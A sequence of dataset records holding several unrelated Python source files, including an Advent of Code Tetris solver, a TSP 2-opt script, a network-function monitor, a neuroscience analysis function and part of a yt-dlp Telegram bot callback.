Asteroid Collision.py","file_ext":"py","file_size_in_byte":1836,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"36858894728","text":"from os import system\nfrom time import sleep\nnbl = open('data.txt').read()\n\ntotal = 0\ntetris = [['####'], ['.#.', '###', '.#.'], ['..#', '..#', '###'], ['#', '#', '#', '#'], ['##', '##']]\nhighr = 0\nlvl = []\nsizem = 7\n\ndef horizontal(curform, dire):\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tif dire == '>':\n\t\tfor ilmn, lmn in enumerate(forme):\n\t\t\tmaxr = x + len(lmn) if lmn[-1] == '#' else x + len(lmn) - 1\n\t\t\tif maxr >= sizem:\n\t\t\t\treturn False\n\t\t\telif lvl[y - ilmn][maxr] == '#':\n\t\t\t\treturn False\n\t\tdraw(curform, True)\n\t\tcurform['x'] += 1\n\telif dire == '<':\n\t\tfor ilmn, lmn in enumerate(forme):\n\t\t\tif lmn[0] == '#':\n\t\t\t\tminr = x - 1\n\t\t\telif lmn[1] == '#':\n\t\t\t\tminr = x\t\n\t\t\telif lmn[2] == '#':\n\t\t\t\tminr = x + 1\t\n\t\t\tif minr < 0:\n\t\t\t\treturn False\n\t\t\telif lvl[y - ilmn][minr] == '#':\n\t\t\t\treturn False\n\t\tdraw(curform, True)\n\t\tcurform['x'] -= 1\n\treturn True\n\ndef goingdown(curform):\n\tglobal highr\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tdraw(curform, True)\n\n\tif y - len(forme) < 0:\n\t\thighr = max(highr, y + len(forme))\n\t\treturn False \n\tfor ix in range(len(forme[0])):\n\t\typos = len(forme) if forme[-1][ix] == '#' else len(forme) - 1\n\t\tif lvl[y - ypos][x + ix] == '#':\n\t\t\thighr = max(highr, y + 1)\n\t\t\treturn False\n\tcurform['y'] -= 1\n\treturn True\n\nindex = -1\ndef drawit(curform):\n#\tsystem('clear')\n\tdraw(curform, False)\n#\tfor li in range(len(lvl) - 1, -1, -1):\n#\t\tprint(lvl[li])\n\t\t#for l in lvl[li]:\n\t\t#\tprint(l, end = '')\n\t\t#print()\n#\tsleep(0.04)\n#\tprint()\n\ndef draw(curform, clean):\n\tforme = curform['forme']\n\tx = curform['x']\n\ty = curform['y']\n\tfor islide, slide in enumerate(forme):\n\t\tfor ixx, xx in enumerate(slide):\n\t\t\tif clean and forme[islide][ixx] != '.':\n\t\t\t\tlvl[y - islide][x + ixx] = '.'\n\t\t\telif lvl[y - islide][x + ixx] == '.':\n\t\t\t\tlvl[y - islide][x + ixx] = forme[islide][ixx]\n\ndef addup(curf):\n\thg = 3 - (len(lvl) - highr - len(curf['forme']))\n\tif hg < 0:\n\t\thg = 0\n\tfor _ in range(hg):\n\t\tlvl.append(['.' 
for _ in range(7)])\n\ngd = False\nwindi = 0\nmaxrok = 2022\nwhile index < maxrok:\n\tc = nbl[windi % len(nbl)]\n\tif gd == False:\n\t\tindex += 1\n\t\tcurform = {'forme': tetris[index % 5], 'y': 0, 'x': 2}\n\t\tdif = 3 - (len(lvl) - highr - len(curform['forme']))\n\t\tdif = 0 if dif > 0 else dif\n\t\taddup(curform)\n\t\tcurform['y'] = len(lvl) - 1 + dif\n\t\tdrawit(curform)\n\tho = horizontal(curform, c)\n\tdrawit(curform)\n\tgd = goingdown(curform)\n\tdrawit(curform)\n\twindi += 1\n\nprint('Part 1: {}'.format(highr))","repo_name":"AFeuillet/CodingGames","sub_path":"AOC/2022/day17/part1.py","file_name":"part1.py","file_ext":"py","file_size_in_byte":2437,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"37201165041","text":"# -*- coding:utf-8 -*-\n__author__ = 'mering Gao'\nimport logging\n\nlogging.basicConfig(level=logging.DEBUG, format='%(levelname)s (%(threadName)-10s) %(message)s', )\n# The multiprocessing module provides an API that, modelled on the threading API, divides work across multiple processes.\n# In some cases it can be dropped in as a replacement for threading to exploit multiple CPU cores\n# and avoid the computational bottleneck of Python's global interpreter lock.\n\n# The simplest way to create a second process is to instantiate a Process object with a target function and call start() to set it working.\n\nimport multiprocessing\n\n\ndef worker():\n print('worker')\n return\n\n\njobs = []\n\nfor i in range(5):\n p = multiprocessing.Process(target=worker)\n jobs.append(p)\n p.start()\n\n# Note that you cannot tell which process prints first: that depends on the actual execution order, because every process competes for access to the output stream.\n","repo_name":"bingle-123/python","sub_path":"python/tech/python_example/thread/multiprocessing1.py","file_name":"multiprocessing1.py","file_ext":"py","file_size_in_byte":866,"program_lang":"python","lang":"zh","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"39768030289","text":"from ast import While\nfrom openpyxl import load_workbook\nimport pandas as pd\nimport numpy as np\nimport random\nimport itertools as iter\nimport time\nimport math\nimport os \n\npath_file = os.getcwd() + '\\Sujet-Données\\Instance.xlsx'\n\nwb = load_workbook(path_file)\nws = wb[\"Feuil1\"]\nn=0\n\nwhile ws.cell(n+2,1).value is not None : \n n=n+1\n\ndist=np.zeros([n,n], dtype=float)\ncox=np.zeros(n,dtype=float)\ncoy=np.zeros(n,dtype=float)\nalpha=np.zeros(n, dtype=float)\na = np.zeros(n, dtype = float)\nb = np.zeros(n, dtype = float)\n\n\n#read the distances into the dist matrix\n\nfor i in range(n):\n\n cox[i]=ws.cell(2+i,2).value\n coy[i]=ws.cell(2+i,3).value\n alpha[i] = ws.cell(2+i,6).value\n a[i] = ws.cell(2+i,4).value\n b[i] = ws.cell(2+i,5).value\n \n\nfor i in range(n):\n for j in range(n):\n dist[i,j]=math.sqrt((cox[i]-cox[j])**2+(coy[i]-coy[j])**2)\n\n\n\ndef two_opt(route):\n\n amelioration = True \n while amelioration == True:\n amelioration = False\n\n for i in range(1,len(route)-2):\n for j in range(1,len(route)-2):\n if j != i-1 and j != i and j != i+1:\n\n if dist[route[i], route[i+1]] + dist[route[j], route[j+1]] > dist[route[i], route[j]] + dist[route[i+1], route[j+1]]:\n temp1 = route[i+1]\n temp2 = route[j]\n route[i+1]=temp2\n route[j]=temp1\n route[i+2:j] = list(reversed(route[i+2:j]))\n\n amelioration = True\n print(\"2opt\", route)\n return route\n\n\n\ndef two_opt_TW(route):\n\n amelioration = True \n while amelioration == True:\n amelioration = False\n\n for i in range(1,len(route)-2):\n for j in range(1,len(route)-2):\n if j != i-1 and j != i and j != i+1:\n \n route_TW = np.zeros(len(route), dtype = int)\n for k in range(len(route)):\n route_TW[k] = route[k]\n\n route_TW[i+1] = route[j]\n route_TW[j] = route[i+1]\n route_TW[i+2:j] = list(reversed(route[i+2:j]))\n \n\n if coutsTW(route) > 
coutsTW(route_TW):\n route = route_TW\n\n amelioration = True\n print(\"2optTW\", route)\n return list(route)\n\n\n\n\nroute = [0, 12, 11, 8, 32, 39, 35, 31, 27, 29, 4, 13, 18, 37, 25, 17, 5, 15, 23, 36, 14, 7, 10, 34, 6, 22, 28, 38, 21, 20, 30, 16, 24, 33, 19, 2, 26, 9, 3, 1, 0]\n\n\n\ndef couts(route):\n\n cout = 0\n\n for i in range(len(route)-2):\n cout+= dist[route[i],route[i+1]]\n cout+= dist[route[n-1],0]\n return cout, len(route)\n\n\n\ndef coutsTW(route):\n\n cout = 0\n t = np.zeros(n, dtype = float)\n \n\n for i in range(len(route)-1):\n\n cout+=dist[route[i], route[i+1]]\n\n t[route[i+1]] = t[route[i]] + dist[route[i], route[i+1]]\n\n if t[route[i+1]] < a[route[i+1]]:\n t[route[i+1]] = a[route[i+1]]\n \n elif t[route[i+1]] > b[route[i+1]]:\n cout += (alpha[route[i+1]])*(t[route[i+1]]-b[route[i+1]])\n\n\n cout += dist[route[len(route)-1],0]\n return cout\n\n\n\nimport matplotlib.pyplot as plt\nimport networkx as nx\nglobal pos\npos={}\n\nfor i in range(n):\n pos[i]=np.array([cox[i],coy[i]])\n\n\n\ndef graphique(route):\n g=nx.Graph()\n g.add_nodes_from({i for i in range(n)})\n for i in range(len(route)-1):\n g.add_edges_from({(route[i],route[i+1])})\n plt.figure(figsize=(10,10))\n nx.draw_networkx(g,pos)\n plt.title('meilleure solution')\n plt.show()\n\ngraphique(route)\ngraphique(two_opt(route))","repo_name":"SimonBayl/Combinatorial-optimization-TSPTW-VRPTW-","sub_path":"Scripts/(V)2-opt.py","file_name":"(V)2-opt.py","file_ext":"py","file_size_in_byte":3336,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"2910398026","text":"#!/usr/bin/env python3\n\nimport signal\nimport threading\nimport readline\nfrom cmd import Cmd\nimport d2agent\n\n\nclass Shell(Cmd):\n agent = {}\n prompt = \"d2agent> \"\n intro = \" _____ \\n\"\n intro = intro + \" / ____| \\n\"\n intro = intro + \"| (___ _ _ ___ __ _ _ __ _____ __\\n\"\n intro = intro + \" \\\\___ \\\\| | | / __|/ _` | '_ \\\\ / _ \\\\ \\\\ /\\\\ / /\\n\"\n intro = intro + \" ____) | |_| \\\\__ \\\\ (_| | | | | (_) \\\\ V V / \\n\"\n intro = intro + \"|_____/ \\\\__,_|___/\\\\__,_|_| |_|\\\\___/ \\\\_/\\\\_/ \\n\"\n\n def __init__(self, ag):\n self.agent = ag\n Cmd.__init__(self)\n def emptyline(self): pass\n def do_quit(self, arg): self.agent.cmd_quit()\n def do_vnf(self, arg): self.agent.cmd_vnf(arg)\n def do_nfvi(self, arg): self.agent.cmd_nfvi(arg)\n def do_thrd(self, arg): self.agent.cmd_thrd(arg)\n def do_sys(self, arg): self.agent.cmd_sys(arg)\n\n\n\ndef main():\n def cb_sigint(num, frame): pass\n signal.signal(signal.SIGINT, cb_sigint)\n\n agent = d2agent.d2agent()\n agent.background_d2monitor = background_d2monitor\n agent.nfvi_add('nfvi0', 'labnet5.dpdk.ninja', 8888)\n agent.vnf_add('vnf0', 'nfvi0')\n agent.vnf_add('vnf1', 'nfvi0')\n # agent.vnf_d2mon('vnf0', 'on')\n\n shell = threading.Thread(target=Shell(agent).cmdloop, name='shell')\n shell.start()\n\n\n\ndef background_d2monitor(d2vnfobj, agent):\n import time\n import math\n import susanow.d2 as d2\n from d2agent import ts\n from d2agent import cast\n from d2agent import myThread\n assert(isinstance(d2vnfobj , d2agent.d2vnf ))\n assert(isinstance(agent , d2agent.d2agent))\n ssn_nfvi = d2vnfobj.nfvi.cast2ssn()\n ssn_vnf = ssn_nfvi.get_vnf(d2vnfobj.name)\n if (ssn_vnf == None):\n print('vnf not found')\n return\n\n seeds = []\n\n f = open('/tmp/ssn_d2log.log', 'a')\n f.write('[{}] {} start d2 monitoring\\n'.format(ts(), ssn_vnf.name()))\n f.flush()\n\n while True:\n cur_thrd = threading.current_thread()\n 
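# Hedged reading: cast() below appears to act as a runtime type assertion from d2agent,\n # and the running_flag check lets the shell thread stop this monitor loop cooperatively.\n 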
cast(myThread, cur_thrd)\n if (cur_thrd.running_flag == False): break\n\n ssn_vnf.sync()\n n_core = ssn_vnf.n_core()\n rxrate = ssn_vnf.rxrate()\n perf = math.floor(ssn_vnf.perfred() * 100)\n perf = 100 if (perf>100) else perf\n\n max_rate = 17000000\n if (perf < 90):\n f.write('[{}] {} d2out\\n'.format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2out(ssn_vnf, ssn_nfvi)\n else:\n if (n_core == 1): pass\n elif (n_core == 2):\n if (perf > 85):\n if (rxrate < (max_rate*0.3)):\n f.write('[{}] {} d2in pattern2\\n'\n .format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2in(ssn_vnf, ssn_nfvi)\n elif (n_core == 4):\n if (perf > 85):\n if (rxrate < (max_rate*0.6)):\n f.write('[{}] {} d2in pattern1\\n'\n .format(ts(), ssn_vnf.name()))\n f.flush()\n d2.d2in(ssn_vnf, ssn_nfvi)\n seed = { ssn_vnf.rxrate(), ssn_vnf.perfred(), ssn_vnf.n_core()}\n seeds.append(seed)\n time.sleep(0.5)\n\n f.write('[{}] finish d2 monitoring\\n'.format(ts()))\n f.flush()\n f.close()\n return\n\n\n\nif __name__ == '__main__':\n main()\n\n\n\n","repo_name":"susanow/d2agent","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3462,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"40222976567","text":"# -*- coding: utf-8 -*-\n\nimport threading\nfrom poco.drivers.std import StdPoco\nfrom poco.utils.device import VirtualDevice\nfrom poco.drivers.std import DEFAULT_ADDR, DEFAULT_PORT\nfrom poco.utils.simplerpc.utils import sync_wrapper\n\n\nclass OSXPoco(StdPoco):\n\n def __init__(self, selector=None, addr=DEFAULT_ADDR, **options):\n if 'action_interval' not in options:\n options['action_interval'] = 0.5\n\n if addr[0] == \"localhost\" or addr[0] == \"127.0.0.1\":\n from poco.drivers.osx.sdk.OSXUI import PocoSDKOSX\n sdk = PocoSDKOSX(addr)\n self.SDKProcess = threading.Thread(target=sdk.run) # 创建线程\n self.SDKProcess.setDaemon(True)\n self.SDKProcess.start()\n\n dev = VirtualDevice(addr[0])\n super(OSXPoco, self).__init__(addr[1], dev, False, **options)\n \n self.selector = selector\n self.connect_window(self.selector)\n self.set_foreground()\n\n @sync_wrapper\n def connect_window(self, selector):\n return self.agent.rpc.call(\"ConnectWindow\", selector)\n\n @sync_wrapper\n def set_foreground(self):\n return self.agent.rpc.call(\"SetForeground\")\n","repo_name":"adolli/Poco","sub_path":"poco/drivers/osx/osxui_poco.py","file_name":"osxui_poco.py","file_ext":"py","file_size_in_byte":1179,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"43"} +{"seq_id":"28426702491","text":"#\"\"\"import time\n#st1=\"core python\"\n#str2=\"\"\"advance python\"\"\"\n#str3='django framwork'\n#print(st1)\n#print(str2)\n#print(str3)\n#time.sleep(1)\n#print(\"end of an application\")\"\"\"\n\"\"\"import time\nstr1=\"core python\"\nprint(str1[0])\nprint(str1[1])\nprint(str1[2])\"\"\"\nimport time\nstr1=\"core python\"\nprint(str1[2::])\ntime.sleep(1)\nprint(\"end of an application\")","repo_name":"shaiksayeed11/my-python-work","sub_path":"strdatatype.py","file_name":"strdatatype.py","file_ext":"py","file_size_in_byte":348,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"43168335463","text":"N, A, B = map(int, input().split())\n\np = 0\n\nfor _ in range(N):\n s, d = input().split()\n x = int(d)\n\n if x < A:\n x = A\n elif x > B:\n x = B\n\n if s == \"East\":\n p += x\n else:\n p -= x\n\nif p > 0:\n print(\"East\", p)\nelif p < 0:\n print(\"West\", abs(p))\nelse:\n 
print(0)\n","repo_name":"0x1feb/atcoder","sub_path":"abc/abc025/abc025_b.py","file_name":"abc025_b.py","file_ext":"py","file_size_in_byte":314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"30833421158","text":"\"\"\"\nBuilds the repo by reading config and replacing placeholders.\n\"\"\"\nimport os\n\nfrom config import REPO_URL, REPO_NAME\n\nfor fname in [\"CONTRIBUTING.md\", \"README.md\", \"setup.py\"]:\n with open(fname, 'r', encoding='UTF-8') as f:\n text = f.read()\n text = text.replace(\"{repo_url}\", REPO_URL)\n text = text.replace(\"{repo_name}\", REPO_NAME)\n\n with open(fname, 'w', encoding='UTF-8') as f:\n f.write(text)\n\nos.makedirs(REPO_NAME, exist_ok=True) # Add your source files to this directory.\n","repo_name":"blengerich/BasicRepoPython","sub_path":"build_repo.py","file_name":"build_repo.py","file_ext":"py","file_size_in_byte":508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"33091194654","text":"print('='*8,'Lista de Convidados','='*8)\nfrom module import interface\nfrom time import sleep\n\nlc = []\nwhile True:\n interface.menu('Menu Principal')\n op = interface.options('Adicionar convidados', 'Ver lista de convidados', 'Sair do Programa')\n if op == 1:\n while True:\n sleep(1)\n interface.titulo('Novo Convidado')\n lc.append(str(input('Nome do convidado: ')).strip().title())\n r = ' '\n while r not in 'SN':\n r = str(input('Deseja adicionar mais convidados? [S/N] ')).strip().upper()[0]\n if r in 'N':\n sleep(1)\n break\n elif op == 2:\n sleep(2)\n if len(lc) == 0:\n print('Sem convidados adicionados ainda.')\n else:\n lc.sort()\n interface.titulo('Lista de Convidados')\n for n in lc:\n print(f'{n}')\n sleep(1)\n elif op == 3:\n interface.menu('Saindo do Programa...')\n sleep(2)\n break\nprint('\\033[34mPrograma Finalizado!\\033[m')\n","repo_name":"Samuel-Melo890/Python-Desafios","sub_path":"ExerciciosPYTHON/NovPython/001.py","file_name":"001.py","file_ext":"py","file_size_in_byte":1061,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"43"} +{"seq_id":"74164507969","text":"# Bilibili Bv Av 号码相互转换工具\n#\n# 算法部分代码来自:\n# https://www.zhihu.com/answer/1099438784\n\nimport time\nimport os\nimport sys\nimport platform\n\n\ndef av2bv():\n clear()\n print(\"\\n[*] ============= av to bv =============\\n\")\n print(\"[*] 输入av(纯数字),例如: 170001\\n 若输入 0 则返回上级\\n\")\n try:\n x = int(input(\"[+] 输入:\"))\n if x == 0:\n return 0\n x = (x ^ xor) + add\n r = list('BV1 4 1 7 ')\n for i in range(6):\n r[index_list[i]] = table[x // 58 ** i % 58]\n result = ''.join(r)\n except Exception as err:\n print(\"\\n[!] 出错\\n\", err)\n else:\n print(\"[+] 结果:\", result)\n input(\"\\n[+] 按 Enter 键继续……\")\n\n\ndef bv2av():\n clear()\n print(\"\\n[*] ============= bv to av =============\\n\")\n print(\"[*] 输入BV,例如: BV17x411w7KC\\n 若输入 0 则返回上级\\n\")\n x = input(\"[+] 输入:\")\n if x == \"0\":\n return 0\n try:\n r = 0\n for i in range(6):\n r += tr[x[index_list[i]]] * 58 ** i\n result = (r - add) ^ xor\n except Exception as err:\n print(\"\\n[!] 
出错\\n\", err)\n else:\n print(\"[+] 结果:\", result)\n input(\"\\n[+] 按 Enter 键继续……\")\n\n\ndef clear():\n sysinfo = platform.platform()\n if \"indows\" in sysinfo:\n os.system(\"cls\")\n elif \"inux\" in sysinfo:\n os.system(\"clear\")\n else:\n os.system(\"cls\")\n\n\ndef quit_(_info):\n print(_info)\n sys.exit()\n\n\ndef choose():\n while 1:\n print(\"\\n[*] ========== MENU ==========\\n\")\n print(\"[*] 1. Av 转 Bv\\n[*] 2. Bv 转 Av\\n[*] 0. 退出\")\n a = input(\"\\n[+] 选择:\")\n if a == \"1\":\n while 1:\n sig = av2bv()\n if sig == 0:\n break\n clear()\n elif a == \"2\":\n while 1:\n sig = bv2av()\n if sig == 0:\n break\n clear()\n elif a == \"0\":\n clear()\n break\n else:\n print(\"[#] 输入有误,请重新输入\")\n time.sleep(1.5)\n clear()\n\n\nif __name__ == '__main__':\n # 初始化生成 tr\n table = 'fZodR9XQDSUm21yCkr6zBqiveYah8bt4xsWpHnJE7jL5VG3guMTKNPAwcF'\n tr = {}\n for i in range(58):\n tr[table[i]] = i\n xor = 177451812\n add = 8728348608\n index_list = [11, 10, 3, 8, 4, 6] # r列表中的索引号\n try:\n choose()\n except KeyboardInterrupt:\n quit_(\"\\n\\n[!] Raised KeyboardInterrupt! >>> Exiting……\")\n","repo_name":"hui-shao/python-toolkit","sub_path":"Bilibili/bv-av/av-bv-converter.py","file_name":"av-bv-converter.py","file_ext":"py","file_size_in_byte":2615,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"43"} +{"seq_id":"8998712682","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nimport pandas as pd\nfrom .. import utils, lookups\n\ndef run_controlled_reversal_mismatch_traces(meta, pref_tensor, filter_licking=None, filter_running=None,\n filter_hmm_engaged=True, force_same_day_reversal=False,\n use_stages_for_reversal=False, skew_stages_for_reversal=True,\n boot=False):\n \"\"\"\n Calculate a mismatch binning running and calculating between matched bins, then averaging across bins\n\n :param meta:\n :param pref_tensor:\n :param filter_running:\n :param filter_licking:\n :param filter_hmm_engaged:\n :param force_same_day_reversal:\n :return:\n reversal_mismatch\n \"\"\"\n\n # get mouse from metadata\n mouse = meta.reset_index()['mouse'].unique()[0]\n\n # mean_t_tensor = utils.tensor_mean_per_trial(meta, pref_tensor, nan_licking=False, account_for_offset=True)\n\n # get day of reversal\n if force_same_day_reversal:\n post_rev = meta.reset_index()['date'].mod(1).isin([0.5]).values\n if np.sum(post_rev) == 0:\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have single-day reversal.')\n return out\n rev_date = meta.reset_index().loc[post_rev, 'date'].unique()[0] - 0.5\n pre_rev = meta.reset_index()['date'].isin([rev_date]).values\n elif use_stages_for_reversal:\n assert 'parsed_11stage' in meta.columns\n pre_rev = meta.parsed_11stage.isin(['L5 learning']).values\n post_rev = meta.parsed_11stage.isin(['L1 reversal1']).values\n elif skew_stages_for_reversal:\n pre_rev = meta.parsed_11stage.isin(['L5 learning']).values\n rev_vec = meta.reset_index()['learning_state'].isin(['reversal1']).values\n if all(~rev_vec):\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have any reversal.')\n if boot:\n return out, out\n return out\n post_rev_date = meta.reset_index().loc[rev_vec, 'date'].iloc[0]\n post_rev = meta.reset_index()['date'].isin([post_rev_date]).values\n post_rev[np.where(post_rev)[0][100:]] = False\n else:\n learning_vec = meta.reset_index()['learning_state'].isin(['learning']).values\n rev_date = meta.reset_index().loc[learning_vec, 'date'].iloc[-1]\n 
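# Default path: the last 'learning' date becomes the pre-reversal day and, just below,\n # the first 'reversal1' date becomes the post-reversal day.\n 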
pre_rev = meta.reset_index()['date'].isin([rev_date]).values\n rev_vec = meta.reset_index()['learning_state'].isin(['reversal1']).values\n if all(~rev_vec):\n out = np.zeros(pref_tensor.shape[0])\n out[:] = np.nan\n print(f'Mouse {mouse} did not have any reversal.')\n return out\n post_rev_date = meta.reset_index().loc[rev_vec, 'date'].iloc[0]\n post_rev = meta.reset_index()['date'].isin([post_rev_date]).values\n print(f'{mouse}: pre-rev: {np.sum(pre_rev)}, post-rev: {np.sum(post_rev)}')\n rev_day = (pre_rev | post_rev)\n\n # filter to include fixed running type: low or high\n if filter_running is not None:\n speed_cm_s = meta.speed.values\n if filter_running == 'low_speed_only':\n rev_day = rev_day & (speed_cm_s <= 6) # was 4\n print('WARNING low_speed_only set to 6 cm/s')\n elif filter_running == 'high_speed_only':\n rev_day = rev_day & (speed_cm_s > 20) # was 10\n print('WARNING high_speed_only set to 20 cm/s')\n else:\n raise NotImplementedError\n\n # filter to include fixed licking type: low or high\n if filter_licking is not None:\n # TODO this needs accounting for offset licking for offset cells\n # TODO could also do a grid of lick and run bins to make comparisons\n mean_lick_rate = meta.anticipatory_licks.values / lookups.stim_length[mouse]\n if filter_licking == 'low_lick_only':\n rev_day = rev_day & (mean_lick_rate <= 1.7)\n elif filter_licking == 'high_lick_only':\n rev_day = rev_day & (mean_lick_rate > 1.7)\n else:\n raise NotImplementedError\n\n # animal must be engaged in the task (or naive when it can't \"engage\")\n if filter_hmm_engaged:\n rev_day = rev_day & (meta.hmm_engaged.values | meta.learning_state.isin(['naive']).values)\n\n print(f' --> {mouse}: pre-rev: {np.sum(pre_rev & rev_day)}, post-rev: {np.sum(post_rev & rev_day)}')\n\n # calculate mean for preferred cue for each cell across reversal\n pre_bins = utils.bin_running_traces_calc(meta, pref_tensor, (rev_day & pre_rev))\n post_bins = utils.bin_running_traces_calc(meta, pref_tensor, (rev_day & post_rev))\n # TODO may want to NOT do this across running always so you can get a trace with SEM error bars\n\n pre_sem = np.nanstd(pref_tensor[:, :, (rev_day & pre_rev)], axis=2) \\\n / np.sqrt(np.sum(~np.isnan(pref_tensor[:, :, (rev_day & pre_rev)]), axis=2))\n post_sem = np.nanstd(pref_tensor[:, :, (rev_day & post_rev)], axis=2) \\\n / np.sqrt(np.sum(~np.isnan(pref_tensor[:, :, (rev_day & post_rev)]), axis=2))\n simple_pre_mean = np.nanmean(pref_tensor[:, :, (rev_day & pre_rev)], axis=2)\n simple_post_mean = np.nanmean(pref_tensor[:, :, (rev_day & post_rev)], axis=2)\n reversal_mismatch = np.nanmean(post_bins - pre_bins, axis=2)\n pre_collapse_bins = np.nanmean(pre_bins, axis=2)\n post_collapse_bins = np.nanmean(post_bins, axis=2)\n\n return [reversal_mismatch, pre_collapse_bins, post_collapse_bins,\n pre_sem, post_sem, simple_pre_mean, simple_post_mean]","repo_name":"klmcguir/cascade","sub_path":"cascade/plotting/mismatch.py","file_name":"mismatch.py","file_ext":"py","file_size_in_byte":5633,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"43"} +{"seq_id":"29083226580","text":"import logging\nlogging.basicConfig(level=logging.DEBUG,\n format='%(asctime)s - %(name)s - %(levelname)s - %(message)s')\nLOGGER = logging.getLogger(__name__)\n\nimport asyncio\nimport json\nimport math\nimport os\nimport shutil\nimport time\nfrom datetime import datetime\n\nfrom apdbot import (\n DOWNLOAD_LOC,\n AUTH\n)\n\nimport 
pyrogram\nlogging.getLogger(\"pyrogram\").setLevel(logging.WARNING)\n\nfrom apdbot.helpers.upload_to_tg import upload_to_tg\n\n\nasync def ytdl_callback(bot, update):\n #LOGGER.info(update)\n cb_data = update.data\n # youtube_dl extractors\n tg_send_type, youtube_dl_format, youtube_dl_ext = cb_data.split(\"|\")\n #\n current_user_id = update.message.reply_to_message.from_user.id\n current_touched_user_id = update.from_user.id\n if current_user_id != current_touched_user_id:\n await bot.answer_callback_query(\n callback_query_id=update.id,\n text=\"Your are not the Right Person ­Ъцћ\",\n show_alert=True,\n cache_time=0\n )\n return False, None\n user_working_dir = os.path.join(DOWNLOAD_LOC, str(current_user_id))\n # create download directory, if not exist\n if not os.path.isdir(user_working_dir):\n await bot.delete_messages(\n chat_id=update.message.chat.id,\n message_ids=[\n update.message.message_id,\n update.message.reply_to_message.message_id,\n ],\n revoke=True\n )\n return\n save_ytdl_json_path = user_working_dir + \\\n \"/\" + str(\"ytdleech\") + \".json\"\n try:\n with open(save_ytdl_json_path, \"r\", encoding=\"utf8\") as f:\n response_json = json.load(f)\n os.remove(save_ytdl_json_path)\n except (FileNotFoundError) as e:\n await bot.delete_messages(\n chat_id=update.message.chat.id,\n message_ids=[\n update.message.message_id,\n update.message.reply_to_message.message_id,\n ],\n revoke=True\n )\n return False\n #\n response_json = response_json[0]\n # TODO: temporary limitations\n # LOGGER.info(response_json)\n #\n youtube_dl_url = response_json.get(\"webpage_url\")\n LOGGER.info(youtube_dl_url)\n #\n custom_file_name = \"%(title)s.%(ext)s\"\n # https://superuser.com/a/994060\n LOGGER.info(custom_file_name)\n #\n await update.message.edit_caption(\n caption=\"`Trying to Download...`\"\n )\n description = \"@APDLeechBox\"\n if \"fulltitle\" in response_json:\n description = response_json[\"fulltitle\"][0:1021]\n # escape Markdown and special characters\n #\n tmp_directory_for_each_user = os.path.join(\n DOWNLOAD_LOC,\n str(update.message.message_id)\n )\n if not os.path.isdir(tmp_directory_for_each_user):\n os.makedirs(tmp_directory_for_each_user)\n download_directory = tmp_directory_for_each_user\n download_directory = os.path.join(tmp_directory_for_each_user, custom_file_name)\n command_to_exec = []\n if tg_send_type == \"audio\":\n command_to_exec = [\n \"yt-dlp\",\n \"-c\",\n \"--prefer-ffmpeg\",\n \"--extract-audio\",\n \"--audio-format\", youtube_dl_ext,\n \"--audio-quality\", youtube_dl_format,\n youtube_dl_url,\n \"-o\", download_directory,\n # \"--external-downloader\", \"aria2c\"\n ]\n else:\n # command_to_exec = [\"youtube-dl\", \"-f\", youtube_dl_format, \"--hls-prefer-ffmpeg\", \"--recode-video\", \"mp4\", \"-k\", youtube_dl_url, \"-o\", download_directory]\n minus_f_format = youtube_dl_format\n if \"youtu\" in youtube_dl_url:\n for for_mat in response_json[\"formats\"]:\n format_id = for_mat.get(\"format_id\")\n if format_id == youtube_dl_format:\n acodec = for_mat.get(\"acodec\")\n vcodec = for_mat.get(\"vcodec\")\n if acodec == \"none\" or vcodec == \"none\":\n minus_f_format = youtube_dl_format + \"+bestaudio\"\n break\n command_to_exec = [\n \"yt-dlp\",\n \"-c\", \"--all-subs\", \"--write-sub\",\n \"--embed-subs\",\n \"-f\", minus_f_format,\n \"--hls-prefer-ffmpeg\", youtube_dl_url,\n \"-o\", download_directory,\n # \"--external-downloader\", \"aria2c\"\n ]\n #\n command_to_exec.append(\"--no-warnings\")\n # command_to_exec.append(\"--quiet\")\n 
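# --restrict-filenames below keeps yt-dlp's output filenames ASCII-only and free of shell-unsafe characters.\n 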
command_to_exec.append(\"--restrict-filenames\")\n #\n if \"hotstar\" or \"m3u8\" in youtube_dl_url:\n command_to_exec.append(\"--geo-bypass-country\")\n command_to_exec.append(\"IN\")\n LOGGER.info(command_to_exec)\n start = datetime.now()\n process = await asyncio.create_subprocess_exec(\n *command_to_exec,\n # stdout must a pipe to be accessible as process.stdout\n stdout=asyncio.subprocess.PIPE,\n stderr=asyncio.subprocess.PIPE,\n )\n # Wait for the subprocess to finish\n stdout, stderr = await process.communicate()\n e_response = stderr.decode().strip()\n t_response = stdout.decode().strip()\n # LOGGER.info(e_response)\n # LOGGER.info(t_response)\n ad_string_to_replace = \"`Try With Another Bot Again and Again./nIf Still Getting Errors ­Ъци Its Not Supported then.`\"\n if e_response and ad_string_to_replace in e_response:\n error_message = e_response.replace(ad_string_to_replace, \"\")\n await update.message.edit_caption(\n caption=error_message\n )\n return False, None\n if t_response:\n # LOGGER.info(t_response)\n # os.remove(save_ytdl_json_path)\n end_one = 